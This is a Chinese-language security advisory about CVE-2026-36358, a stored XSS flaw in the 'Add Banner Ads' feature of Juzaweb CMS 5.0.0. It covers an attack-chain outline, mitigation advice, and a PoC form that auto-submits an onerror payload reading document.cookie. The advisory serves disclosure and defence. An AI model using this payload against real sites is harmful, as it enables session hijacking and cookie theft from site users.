IPBUF安全漏洞报告
English
CVE-2026-36358 CVSS 5.4 中危

CVE-2026-36358 Juzaweb CMS跨站脚本漏洞

披露日期: 2026-05-06
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-36358
漏洞类型
跨站脚本 (XSS)
CVSS评分
5.4 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
需要交互 (UI:R)
影响产品
Juzaweb CMS

相关标签

XSS跨站脚本Juzaweb CMSCVE-2026-36358Web安全

漏洞概述

Juzaweb CMS v5.0.0版本中存在跨站脚本漏洞。该漏洞源于“Add Banner Ads”功能未能正确过滤用户输入。远程攻击者可利用此漏洞,通过构造精心设计的恶意脚本,诱导管理员或其他用户访问,从而在受害者浏览器中执行任意JavaScript代码,造成会话劫持或数据窃取。

技术细节

该漏洞属于存储型XSS。在Juzaweb CMS v5.0.0的“Add Banner Ads”功能中,系统未对用户提交的Banner广告代码或内容进行严格的HTML实体编码或过滤。攻击者可以构造包含<script>标签或事件处理器(如onerror)的Payload。由于系统直接存储该数据并在前端渲染,当受害者浏览页面时,浏览器解析Payload并执行恶意JS代码。利用CVSS向量AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N可知,攻击需要低权限账号(如注册用户)且需要用户交互(如点击或浏览),攻击范围可扩展至其他用户。

攻击链分析

STEP 1
1. 信息收集与登录
攻击者获取一个低权限账户(PR:L),登录Juzaweb CMS后台。
STEP 2
2. 构造Payload
攻击者编写包含恶意JavaScript的HTML代码,例如<script>alert(1)</script>。
STEP 3
3. 注入Payload
攻击者访问“Add Banner Ads”功能,将Payload注入到广告内容字段中并保存。
STEP 4
4. 触发漏洞
当管理员或普通用户访问显示该广告的页面时,浏览器解析并执行恶意脚本。
STEP 5
5. 执行攻击
恶意脚本运行,窃取Cookie、会话令牌或重定向用户,实现机密性和完整性破坏。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- PoC for CVE-2026-36358 --> <!-- Description: Inject XSS payload via the Add Banner Ads function --> <html> <body> <form action="http://target.com/admin/banner-ads" method="POST"> <input type="hidden" name="title" value="Malicious Ad" /> <input type="hidden" name="type" value="code" /> <!-- Payload containing script to execute alert --> <input type="hidden" name="content" value="<img src=x onerror=alert(document.cookie)>" /> <input type="submit" value="Submit" /> </form> <script> // Auto-submit the form for demonstration document.forms[0].submit(); </script> </body> </html>

影响范围

Juzaweb CMS 5.0.0

防御指南

临时缓解措施
建议用户暂时禁用“Add Banner Ads”功能或严格限制广告发布权限。管理员应审查现有广告内容,移除可疑代码。部署Web应用防火墙(WAF)以拦截常见的XSS攻击模式。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表